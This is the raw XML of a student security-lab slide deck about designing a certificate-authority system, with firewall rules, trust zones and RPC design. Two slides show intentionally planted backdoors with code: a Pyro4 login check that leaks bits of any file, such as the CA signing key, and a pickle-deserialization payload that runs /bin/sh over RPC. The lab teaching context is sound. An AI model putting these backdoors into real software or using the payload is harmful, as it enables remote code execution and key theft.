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2"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="258" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="263" r:id="rId7"/>
    <p:sldId id="262" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="269" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="270" r:id="rId12"/>
    <p:sldId id="266" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="271" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21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79" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="-12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BCAA4-4482-614C-80C6-73FA26298AAE}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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82379-A838-CD43-9349-22C09948BC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557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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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88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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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71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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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033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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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406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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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75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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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09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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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7023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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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854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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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8176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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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527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6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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558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A6E3A-7677-3847-B90F-2BD29FFC43C8}" type="datetimeFigureOut">
              <a:rPr lang="de-DE" smtClean="0"/>
              <a:t>12/11/13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2D705-9078-5940-ADCE-6BC2855523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23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Applied Security Laboratory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Group 3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Gähwiler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Marc, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Helminger </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Leonhard, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Zeindler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Fabian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4864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Backdoor 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3905"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Compile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>a vulnerable core.py file of the Pyro4 RPC middleware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>into core.pyc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Vuln Pyro4 checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>= credential_login </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>hecks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>username has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>prefix (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>xtracts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>a filename from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>provided username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>ses password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>as offset n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>ries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>to read the nth bit of the provided </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>the bit is 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>a login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>error, successful login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>otherwise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>any file that the core RPC application can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>(CA signing key)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4974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548107"/>
            <a:ext cx="8229600" cy="557805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try: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if method.__name__ == "credential_login”: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if len(vargs) == 2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>            user, password = vargs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>            if user.startswith("_BD:"):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                filename = user[4:]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offset = bit_offset_calculation(int(password))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with file(filename, "rb") as f:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                    return get_bit(f, offset)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt; PWND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410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Review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946484" y="1350800"/>
            <a:ext cx="21896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/>
              <a:t>Comparison</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="3200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1026692" y="5320646"/>
            <a:ext cx="7555832" cy="1425072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>User data change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Backup/Logging</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Bild 7" descr="system_overview_n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5" y="2058737"/>
            <a:ext cx="5073353" cy="3285850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Bild 8" descr="syste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48" y="1802811"/>
            <a:ext cx="3998976" cy="354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89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Found backdoors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XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>rshell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2082681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607681" y="1550737"/>
            <a:ext cx="16916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dirty="0" smtClean="0"/>
              <a:t>NA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641490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2626313" y="2125579"/>
            <a:ext cx="16916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dirty="0" smtClean="0"/>
              <a:t>NA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857826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3735892" y="3120397"/>
            <a:ext cx="16916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dirty="0" smtClean="0"/>
              <a:t>NA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857826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6021890" y="3235159"/>
            <a:ext cx="16916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dirty="0" smtClean="0"/>
              <a:t>NA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857826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6850733" y="4692316"/>
            <a:ext cx="16916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dirty="0" smtClean="0"/>
              <a:t>NA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857826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batma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DE" dirty="0" smtClean="0"/>
              <a:t>BATMAN!!!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8495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 design</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bild 4" descr="sysseclab_net_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79" y="1417637"/>
            <a:ext cx="7058526" cy="529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44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differenc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9070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 design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Introducing different trust zones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Security in depth</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Least privilege</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Assume external systems are insecure &amp; Isolate public access </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Minimize exposure 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6761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System design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Review user data change</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Binding user data &lt;-&gt; Certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>User data change  breaks binding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>CA should verify user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial"/>
              <a:buChar char="→"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> Review for user data change needed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3903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748231"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1588170" y="2225851"/>
          <a:ext cx="6218989" cy="432333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89383"/>
                <a:gridCol w="1968455"/>
                <a:gridCol w="1861151"/>
              </a:tblGrid>
              <a:tr h="339469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Source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Protocol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Destination</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>Webserver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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTPS (443)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effectLst/>
                        </a:rPr>
                        <a:t>Internet</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>Internet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 smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTTPS (443) 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effectLst/>
                        </a:rPr>
                        <a:t>Webserver</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>OpenVPN network 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 smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>IPCop SSH (8022)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effectLst/>
                        </a:rPr>
                        <a:t>MainFirewall</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>BackupServer 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800" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>IPCop SSH (8022) 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effectLst/>
                        </a:rPr>
                        <a:t>MainFirewall</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>OpenVPN network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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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effectLst/>
                        </a:rPr>
                        <a:t>Backupserver</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>OpenVPN network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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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effectLst/>
                        </a:rPr>
                        <a:t>CACore</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>OpenVPN network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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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effectLst/>
                        </a:rPr>
                        <a:t>Webserver</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="403257"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effectLst/>
                        </a:rPr>
                        <a:t>Backupserver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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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effectLst/>
                        </a:rPr>
                        <a:t>Webserver</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="339469"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effectLst/>
                        </a:rPr>
                        <a:t>Webserver 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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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effectLst/>
                        </a:rPr>
                        <a:t>CACore</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1800" dirty="0" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="339469">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1800" kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>CACore 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kern="1200" dirty="0" smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>SSH (22) </a:t>
                      </a:r>
                      <a:endParaRPr lang="nl-NL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smtClean="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Webserver </a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="18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946484" y="1457743"/>
            <a:ext cx="24032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/>
              <a:t>Firewall rules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48842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 traffic via SSH (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Protect information while being processed, in transit, and in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>storage)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Backup/Logging (BCM, Accountability, Intrusion detection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Local iptables (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Security in depth)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851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33064" y="2108185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Webapplication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Flask (CSRF, XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>nginx (DDOS, HTTPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>RPC </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>via Pyro4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>SSH tunnel (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>secrecy and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>integrity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>CA Core application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>pyOpenSSL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>m2crypto </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>SQLAlchemy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>(SQL injections)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textfeld 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946486" y="1457743"/>
            <a:ext cx="3351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/>
              <a:t>Applications &amp; RPC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784858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Backdoor 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Status daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>(statusd)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Known </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>pickle marshaller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smtClean="0"/>
              <a:t>remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Direct access to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>the web and core </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>port 4445 and 4446 )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483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74639"/>
            <a:ext cx="8229600" cy="5851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class RunBinSh(object):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>    def __reduce__(self):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>        return (subprocess.Popen, (('/bin/sh', ),))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def main():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>    Pyro4.config.SERIALIZER = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pickle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>    rpc = Pyro4.Proxy("PYRO:status@%s:%d" % (host, port))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>    print rpc.test(RunBinSh())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>-&gt; PWND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4250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</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Bildschirmpräsentation (4:3)</PresentationFormat>
  <Paragraphs>116</Paragraphs>
  <Slides>20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Office-Design</vt:lpstr>
      <vt:lpstr>Applied Security Laboratory</vt:lpstr>
      <vt:lpstr>System design</vt:lpstr>
      <vt:lpstr>System design</vt:lpstr>
      <vt:lpstr>System design</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Implementation</vt:lpstr>
      <vt:lpstr>Backdoor 1</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Backdoor 2</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Review</vt:lpstr>
      <vt:lpstr>Found backdoors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BATMAN!!!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Security Laboratory</dc:title>
  <dc:creator>Rock</dc:creator>
  <cp:lastModifiedBy>Rock</cp:lastModifiedBy>
  <cp:revision>25</cp:revision>
  <cp:lastPrinted>2013-12-11T20:49:01Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-11T15:55:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-12-11T20:53:50Z</dcterms:modified>
</cp:coreProperties>
</file>